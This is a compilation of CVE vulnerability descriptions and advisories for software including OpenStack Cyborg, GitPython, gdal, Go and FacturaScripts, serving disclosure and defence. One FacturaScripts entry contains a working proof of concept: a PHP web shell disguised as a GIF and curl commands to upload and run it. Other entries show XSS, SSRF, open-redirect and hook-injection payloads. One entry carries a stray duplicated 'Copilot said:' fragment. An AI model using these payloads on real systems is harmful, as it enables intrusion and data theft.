CVEs

In OpenStack Cyborg before 16.0.1, the Accelerator Request (ARQ) API does not enforce project ownership at any layer. The project_id column in the database is never populated (NULL for every ARQ), database queries have no project filtering, and policy checks are self-referential (the authorize_wsgi decorator compares the caller's project_id with itself rather than the target resource). Any authenticated non-admin user can complete various actions such as deleting ARQs bound to other projects' instances, aka cross-tenant denial of service.

OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC.

Improper access control in Azure AI Foundry M365 published agents allows an unauthorized attacker to elevate privileges over a network.

Improper neutralization of special elements used in a command ('command injection') in Azure Cloud Shell allows an unauthorized attacker to perform spoofing over a network.

Externally controlled reference to a resource in another sphere in Microsoft Partner Center allows an unauthorized attacker to perform spoofing over a network.

Improper input validation in Azure Managed Instance for Apache Cassandra allows an authorized attacker to execute code over a network.

Improper authorization in Microsoft Teams allows an authorized attacker to disclose information over a network.

Improper neutralization of special elements used in a command ('command injection') in Copilot Chat (Microsoft Edge) allows an unauthorized attacker to disclose information over a network.

Improper access control in Azure Managed Instance for Apache Cassandra allows an authorized attacker to execute code over a network.

Improper neutralization of input during web page generation ('cross-site scripting') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

Improper neutralization of special elements in output used by a downstream component ('injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network.

Improper neutralization of special elements in M365 Copilot allows an unauthorized attacker to disclose information over a network.

A security vulnerability has been detected in code-projects Feedback System 1.0. Impacted is an unknown function of the file /admin/checklogin.php. Such manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.

A security flaw has been discovered in CodeAstro Online Classroom 1.0. This vulnerability affects unknown code of the file /askquery.php. The manipulation of the argument squeryx results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.

Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-34429. Reason: This candidate is a duplicate of CVE-2026-34429. Notes: All CVE users should reference CVE-2026-34429 instead of this candidate.

n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. In versions 2.47.4 through 2.47.13, the SDK embedder path (N8NDocumentationMCPServer constructor, getN8nApiClient(), and validateInstanceContext()), the synchronous URL validator in SSRFProtection.validateUrlSync() had no IPv6 checks. IPv4-mapped IPv6 addresses such as http://[::ffff:169.254.169.254] bypassed the cloud-metadata, localhost, and private-IP range checks. An attacker able to supply an n8nApiUrl value could cause the server to issue HTTP requests to cloud metadata endpoints, RFC1918 private networks, or localhost services. Response bodies are returned to the caller (non-blind SSRF), and the n8nApiKey is forwarded in the x-n8n-api-key header to the attacker-controlled target. Projects with deployments embedding n8n-mcp as an SDK using N8NDocumentationMCPServer or N8NMCPEngine with user-supplied InstanceContext are affected. The first-party HTTP server deployment was not primarily affected — it has a second async validator (validateWebhookUrl) that catches IPv6 addresses. This issue has been fixed in version 2.47.14. If users are unable to upgrade immediately as a workaround they can validate URLs before passing to the SDK, restrict egress at the network layer, and reject user-controlled n8nApiUrl values.

Inngest is a platform for running event-driven and scheduled background functions with queueing, retries, and step orchestration. Versions 3.22.0 through 3.53.1 contain a vulnerability that allows unauthenticated remote attackers to exfiltrate environment variables from the host process via the serve() HTTP handler. The serve() handler implements GET, POST, and PUT methods. Requests using PATCH, OPTIONS, or DELETE fall through to a generic handler that returns diagnostic information. A change introduced in v3.22.0 caused this diagnostic response to include the contents of process.env, exposing any secrets, API keys, or credentials present in the environment. An application is vulnerable if its serve() endpoint is reachable via PATCH, OPTIONS, or DELETE requests, which is common in setups like Next.js Pages Router or Express's app.use(...). Not affected are Next.js App Router handlers that export only GET, POST, and PUT, and applications using the connect worker method. This issue has been fixed in version 3.54.0. To work around this issue if upgrading is not immediately possible, restrict the serve() endpoint at the framework or reverse-proxy layer to accept only GET, POST, and PUT. The Inngest serve() endpoint does not require any other HTTP methods.

i18nextify is a JavaScript library that adds website internationalization via a script tag, without source code changes. Versions prior to 4.0.8 substitute {{key}} interpolation tokens inside src and href attribute values with the raw string returned by i18next.t(). The substitution logic in src/localize.js (the replaceInside handler) only guards against a duplicated http:// origin prefix — it does not validate the URL scheme of the substituted value. A translated value such as javascript:alert(1) or data:text/html,<script>...</script> is applied unchanged to the live DOM attribute when an attacker can influence the content of a translation file or the translation-backend response — for example, via a compromised translation CDN, user-contributed locales, a MITM on a plain-HTTP backend, or write access to the translation JSON. This issue was patched in version 4.0.8.

Copilot said: i18nextify is a JavaScript library that adds i18nextify is a JavaScript library that adds website internationalization via a script tag, without source code changes. Versions prior to 3.0.5 interpolate the lng and ns values directly into the configured loadPath / addPath URL template without any encoding, validation, or path sanitisation. When an application exposes the language-code selection to user-controlled input (the default — i18next-browser-languagedetector reads ?lng= query params, cookies, localStorage, and request headers), an attacker can inject characters that change the structure of the outgoing request URL. This is a single URL-injection vulnerability. The attacker-controlled value is neutralised before it is used as part of an output URL string; the attack shape covers both path traversal and broader URL-structure injection — both are closed by the one interpolateUrl sanitisation fix. This issue has been fixed in version 3.0.5. If users cannot upgrade immediately, they can work around the issue by sanitising lng / ns before they reach i18next (strip .., /, \, ?, #, %, whitespace, and control characters; cap the length).

VINCE versions 3.0.38 and earlier do not properly verify the From address authenticity due to encoding confusion and use the from address for automated actions such as Ticket creation or Ticket updates.

A weakness has been identified in OSGeo gdal up to 3.13.0dev-4. The affected element is the function GDfieldinfo of the file frmts/hdf4/hdf-eos/GDapi.c. Executing a manipulation can lead to out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. Upgrading to version 3.13.0RC1 is sufficient to fix this issue. This patch is called a791f70f8eaec540974ec989ca6fb00266b7646c. The affected component should be upgraded.

A security flaw has been discovered in OSGeo gdal up to 3.13.0dev-4. Impacted is the function GDnentries of the file frmts/hdf4/hdf-eos/GDapi.c. Performing a manipulation of the argument DataFieldName results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 3.13.0RC1 is recommended to address this issue. The patch is named 184f77dbcc74118c062c05e464c88161d3c37b9b. You should upgrade the affected component.

manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30.

A malicious module proxy can exploit a flaw in the go command's validation of module checksums to bypass checksum database validation. This vulnerability affects any user using an untrusted module proxy (GOMODPROXY) or checksum database (GOSUMDB). A malicious module proxy can serve altered versions of the Go toolchain. When selecting a different version of the Go toolchain than the currently installed toolchain (due to the GOTOOLCHAIN environment variable, or a go.work or go.mod with a toolchain line), the go command will download and execute a toolchain provided by the module proxy. A malicious module proxy can bypass checksum database validation for this downloaded toolchain. Since this vulnerability affects the security of toolchain downloads, setting GOTOOLCHAIN to a fixed version is not sufficient. You must upgrade your base Go toolchain. The go tool always validates the hash of a toolchain before executing it, so fixed versions will refuse to execute any cached, altered versions of the toolchain. The go tool trusts go.sum files to contain accurate hashes of the current module's dependencies. A malicious proxy exploiting this vulnerability to serve an altered module will have caused an incorrect hash to be recorded in the go.sum. Users who have configured a non-trusted GOPROXY can determine if they have been affected by running "rm go.sum ; go mod tidy ; go mod verify", which will revalidate all dependencies of the current module. The specific flaw in more detail: The go command consults the checksum database to validate downloaded modules, when a module is not listed in the go.sum file. It verifies that the module hash reported by the checksum database matches the hash of the downloaded module. If, however, the checksum database returns a successful response that contains no entry for the module, the go command incorrectly permitted validation to succeed. A module proxy may mirror or proxy the checksum database, in which case the go command will not connect to the checksum database directly. Checksums reported by the checksum database are cryptographically signed, so a malicious proxy cannot alter the reported checksum for a module. However, a proxy which returns an empty checksum response, or a checksum response for an unrelated module, could cause the go command to proceed as if a downloaded module has been validated.

Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322.

Saltcorn is an extensible, open source, no-code database application builder. Prior to versions 1.4.6, 1.5.6, and 1.6.0-beta.5, Saltcorn validates the post-login dest parameter with a string check that only blocks :/ and //. Because all WHATWG-compliant browsers normalise backslashes (\) to forward slashes (/) for special schemes, a payload such as /\evil.com/path slips through is_relative_url(), is emitted unchanged in the HTTP Location header, and causes the browser to navigate cross-origin to an attacker-controlled domain. The bug is reachable on a default install and only requires a victim who can be tricked into logging in via a crafted Saltcorn URL. This issue has been patched in versions 1.4.6, 1.5.6, and 1.6.0-beta.5.

ParquetSharp is a .NET library for reading and writing Apache Parquet files. From version 18.1.0 to before version 23.0.0.1, DecimalConverter.ReadDecimal makes a stackalloc using what might be an attacker-supplied value. If an attacker declares a decimal column with some unreasonable width, this could lead to a stack overflow. In a service environment, this would potentially take down a service. This affects applications using ParquetSharp to read untrusted Parquet files in a network service. This issue has been patched in version 23.0.0.1.

Budibase is an open-source low-code platform. Prior to version 3.35.10, the budibase:auth cookie containing the JWT session token is set with httpOnly: false at packages/backend-core/src/utils/utils.ts:218. JavaScript can read this cookie via document.cookie. This means every XSS becomes a full account takeover — the attacker steals the JWT and has persistent access to the victim's account. The cookie also lacks secure: true (sent over plaintext HTTP) and sameSite attribute. This issue has been patched in version 3.35.10.

PJSIP is a free and open source multimedia communication library written in C. Prior to version 2.17, on GnuTLS builds, the SIP TLS transport (sip_transport_tls) can accept connections with invalid or untrusted certificates even when the application explicitly enables certificate verification via verify_server = PJ_TRUE or verify_client = PJ_TRUE. This issue has been patched in version 2.17.

The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0).

If a trusted template author were to write a <script> tag containing an empty 'type' attribute or a 'type' attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the <script> block.

ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query "a1=x&a2=x&...&a10000=x&hidden=y" can forward the parameter "hidden=y" while hiding it from the proxy's Rewrite function.

CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a <meta> tag's <content> attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the <content> attribute, the escaper would fail to similarly escape it, leading to XSS.

Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations.

The "go bug" command writes to two files with predictable names in the system temporary directory (for example, "/tmp"). An attacker with access to the temporary directory can create a symlink in one of these names, causing "go bug" to overwrite the target of the symlink.

The "go tool pack" subcommand (usually used only by the compiler as an internal tool with known-good inputs) does not sanitize output filenames. Extracting a malicious archive file with the "pack" subcommand can write files to arbitrary locations on the filesystem.

When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.

When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.

# CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass ## Summary An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. --- ## Details The vulnerability exists in: `Core/Lib/ExtendedController/ProductImagesTrait.php` Specifically in the `addImageAction()` method. ### Vulnerable Code ```php if (false === strpos($uploadFile->getMimeType(), 'image/')) { Tools::log()->error('file-not-supported'); continue; } $folder = Tools::folder('MyFiles'); Tools::folderCheckOrCreate($folder); $uploadFile->move($folder, $uploadFile->getClientOriginalName()); ``` ### Root Cause - The validation only checks if MIME type contains `"image/"` - This can be bypassed by prepending **GIF89a magic bytes** to a PHP file - The system incorrectly identifies the file as `image/gif` - The file is saved with a `.php` extension in a web-accessible directory ### File Storage Behavior Uploaded files are stored in: ``` /MyFiles/YYYY/MM/X.php ``` Where `X` is an auto-incrementing ID. This allows direct remote execution: ``` http://target/MyFiles/2026/03/2.php?cmd=id ``` --- ## Impact Successful exploitation: An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation. --- ## Proof of Concept (Manual) ### Step 1: Create malicious file ```bash cat > shell.jpg.php << 'EOF' GIF89a <?php system($_GET['cmd']); ?> EOF ``` ### Step 2: Authenticate - Login to the application - Extract `PHPSESSID` from browser cookies ### Step 3: Get CSRF token ```bash curl -s "http://target/EditProducto?code=CONTA621" \ -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \ | grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4 ``` ### Step 4: Upload shell ```bash curl -X POST "http://target/EditProducto?code=CONTA621" \ -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \ -F "multireqtoken=YOUR_CSRF_TOKEN" \ -F "action=add-image" \ -F "activetab=EditProductoImagen" \ -F "idproducto=3" \ -F "newfiles[]=@shell.jpg.php" ``` ### Step 5: Execute command ```bash curl "http://target/MyFiles/2026/03/2.php?cmd=id" ``` --- ## Affected Products | Field | Value | |---|---| | Ecosystem | Packagist | | CVE ID | CVE-2026-42879 | | Package Name | `facturascripts/facturascripts` | | Affected Versions | <= 2025.81 | | Patched Versions | Not yet patched | | Fixed in | Pending | --- ## Remediation Recommendations 1. **Validate file extension** — reject any upload where the filename ends in `.php`, `.phtml`, `.phar`, or other executable extensions, regardless of MIME type 2. **Re-generate filenames on the server** — never use `getClientOriginalName()`; assign a safe UUID-based name with a validated extension 3. **Store uploads outside the webroot** — serve files through a controller that streams content, preventing direct URL execution 4. **Use a file type library** — validate actual file content (magic bytes + extension + MIME type) with a library like `fileinfo` rather than trusting client-supplied MIME ## Credits - **Discoverer**: Abdullah Alwasabei / Guzrex

### Summary An unauthenticated information disclosure vulnerability in the Installer controller allows any remote attacker to trigger phpinfo() on a fresh FacturaScripts deployment by requesting /?phpinfo=TRUE, exposing full PHP configuration, server environment variables (including any database credentials, API keys, or application secrets set as env vars), filesystem paths, and loaded extensions without being authenticated. ### Details The phpinfo() debug endpoint was intentionally added in commit 8c31c106 ("Added phpinfo option to the installer") on February 27, 2018, and has remained in the codebase for over 8 years across multiple major versions. The feature appears to have been added as a convenience tool to help users diagnose PHP configuration during installation. However, it exposes sensitive server information to any unauthenticated attacker who knows the parameter. Vulnerable code (Core/Controller/Installer.php ~line 115): if ('TRUE' === $this->request->query('phpinfo', '')) { phpinfo(); return; } This vulnerability is of the same class as CVE-2025-34081 (CONPROSYS HMI System unauthenticated phpinfo() exposure), which received a CVE assignment. Introduced: commit 8c31c1060581ad6ad591c7689da3a8df8a29f486 (Feb 27 2018) Still present: v2026-39-g262e79208 (confirmed April 2026) ### PoC Prerequisites: Fresh FacturaScripts deployment where installation has not yet been completed (config.php does not contain db_name). Step 1 — Clone and serve the application: git clone https://github.com/NeoRazorX/facturascripts cd facturascripts php -S localhost:8000 Step 2 — Send the following unauthenticated GET request: GET /?phpinfo=TRUE HTTP/1.1 Host: localhost:8000 Step 3 — Observe full phpinfo() output returned (20+ pages) containing: - Complete PHP configuration - All server environment variables - Filesystem paths - Loaded extensions and versions - HTTP request headers No credentials, cookies, or prior interaction required. Tested on: PHP 8.1.34, macOS, fresh clone with no configuration applied. Proof of concept screenshot/PDF available. ### Impact Vulnerability type: Unauthenticated Information Disclosure (CWE-200) Any unauthenticated remote attacker who can reach a freshly deployed FacturaScripts instance before installation is completed can retrieve the full PHP environment. On production deployments this includes: - Database credentials (DB_PASSWORD, DB_USER) if set as environment variables - Application secrets (APP_KEY, JWT secrets) if set as environment variables - Cloud provider credentials (AWS_SECRET_ACCESS_KEY, etc.) if present - Full server filesystem paths enabling targeted path traversal attempts - Exact PHP version and loaded extensions enabling version-specific attacks - All HTTP headers revealing internal infrastructure details - Database connection configuration (mysqli default socket, PDO drivers) - Exact PHP version enabling version-specific CVE targeting (PHP 8.1.34) Fresh deployments are commonly left unconfigured for extended periods on shared hosting and cloud environments, making this window reliably exploitable in real-world scenarios. Fix: Remove lines 115-118 from Core/Controller/Installer.php: if ('TRUE' === $this->request->query('phpinfo', '')) { phpinfo(); return; }

## Summary A stored Cross-Site Scripting (XSS) vulnerability exists in the product search modal of sales and purchases documents. An authenticated user with access to the warehouse module can create a product with a malicious reference that executes arbitrary JavaScript in the browser of any other user who opens the product search modal inside an invoice, order, or delivery note. ## Affected files - `Core/Lib/AjaxForms/SalesModalHTML.php` - `Core/Lib/AjaxForms/PurchasesModalHTML.php` ## Vulnerability details The `referencia` field of a product variant is injected directly into an HTML `onclick` attribute string without JavaScript context escaping: ```php // SalesModalHTML.php ~line 102 $tbody .= '<tr onclick="return salesFormAction(\'add-product\', \'' . $row['referencia'] // no htmlspecialchars() applied . '\');">'; ``` When a product is saved, `noHtml()` encodes `'` → `&#39;`. This appears safe in static HTML context. However, the modal HTML is later returned as a JSON response and inserted into the DOM via `innerHTML`: ```javascript // SalesDocument.html.twig line 118 document.getElementById("findProductList").innerHTML = data.products; ``` The browser HTML parser decodes `&#39;` → `'` during the `innerHTML` assignment, breaking out of the JavaScript string literal in the `onclick` attribute and executing the injected code. **Attack payload stored in database:** `x&#39;+alert(1)+&#39;` **Resulting `onclick` after `innerHTML` decode:** ```javascript return salesFormAction('add-product', 'x'+alert(1)+'') // ^^^^^^^^^^ executes before the function call ``` ## Steps to reproduce **Step 1 — Inject the payload** 1. Log in as a user with write access to Warehouse → Products 2. Navigate to `/EditProducto` and create a new product with the following values: | Field | Value | |---|---| | Reference | `x'+alert(1)+'` | | Description | `test` | 3. Save the product **Step 2 — Trigger the XSS** 1. Make sure at least one customer exists in the system (Sales → Customers) 2. Navigate to `/EditFacturaCliente?codcliente=<customer_code>` 3. In the invoice form, click the product search button next to the "Referencia" field 4. Click on the 'malicious' product `alert(1)` <img width="1162" height="536" alt="image" src="https://github.com/user-attachments/assets/aaa2879e-c1fb-4af9-8501-bac03ca24ffe" /> ## Impact Although session cookies (`fsLogkey`, `fsNick`) have the `HttpOnly` flag set and cannot be read directly via `document.cookie`, the injected script runs in the victim's authenticated browser context, meaning the attacker can make arbitrary authenticated requests on their behalf, create new admin users via AJAX POST to `/EditUser`, exfiltrate any business data visible in the DOM, or redirect the user to an external site. The most critical scenario is privilege escalation: a low-privilege employee with only warehouse access can execute JavaScript in an administrator's session without knowing their password. ## Recommended fix Apply `htmlspecialchars()` with `ENT_QUOTES` before inserting `referencia` into the `onclick` attribute in both affected files. **`Core/Lib/AjaxForms/SalesModalHTML.php`** ```php // Before (vulnerable): $tbody .= '<tr onclick="return salesFormAction(\'add-product\', \'' . $row['referencia'] . '\');">'; // After (safe): $tbody .= '<tr onclick="return salesFormAction(\'add-product\', \'' . htmlspecialchars($row['referencia'], ENT_QUOTES, 'UTF-8') . '\');">'; ``` **`Core/Lib/AjaxForms/PurchasesModalHTML.php`** Apply the same change to the equivalent line. **Why `ENT_QUOTES` is required:** `ENT_QUOTES` encodes both `"` and `'` characters. This ensures that `'` is stored as `&#39;` and — critically — remains `&#39;` after `innerHTML` assignment, because `htmlspecialchars` produces a form that the HTML parser does not decode back into a raw quote inside a JS string context. **Alternative mitigation:** replace `innerHTML` with `innerText` or a DOM-based rendering approach that never parses injected strings as HTML. This would eliminate the entire class of HTML-injection-via-innerHTML vulnerabilities in the sales and purchases forms. ## Credits Omar Ramirez

A vulnerability was identified in OSGeo gdal up to 3.13.0dev-4. This issue affects the function SWnentries of the file frmts/hdf4/hdf-eos/SWapi.c. Such manipulation of the argument DimensionName leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 3.12.4RC1 is capable of addressing this issue. The name of the patch is 9491e794f1757f08063ea2f7a274ad2994afa636. It is advisable to upgrade the affected component.

A vulnerability was determined in OSGeo gdal up to 3.13.0dev-4. This vulnerability affects the function memmove of the file frmts/hdf4/hdf-eos/SWapi.c of the component HDF-EOS Grid File Handler. This manipulation causes out-of-bounds read. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.13.0RC1 is able to resolve this issue. Patch name: a791f70f8eaec540974ec989ca6fb00266b7646c. Upgrading the affected component is advised.

A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects an unknown part of the file /ajax.php?action=save_user. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.

Postorius through 1.3.13 does not escape HTML in the message subject when rendering it in the Held messages pop-up, as exploited in the wild in May 2026.

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header — so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48.

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.47, _clone() validates multi_options as the original list, then executes shlex.split(" ".join(multi_options)). A string like "--branch main --config core.hooksPath=/x" passes validation (starts with --branch), but after split becomes ["--branch", "main", "--config", "core.hooksPath=/x"]. Git applies the config and executes attacker hooks during clone. This issue has been patched in version 3.1.47.

GitPython is a python library used to interact with Git repositories. From version 3.1.30 to before version 3.1.47, GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False. This issue has been patched in version 3.1.47.

Notepad Next is a cross-platform, reimplementation of Notepad++. Prior to version 0.14, NotepadNext's detectLanguageFromExtension() function interpolates a file's extension directly into a Lua script without sanitization. An attacker can craft a filename whose extension contains Lua code, which executes automatically when the victim opens the file in NotepadNext. Because luaL_openlibs() is called unconditionally, the full os, io, and package libraries are available to the injected code, enabling arbitrary command execution. This issue has been patched in version 0.14.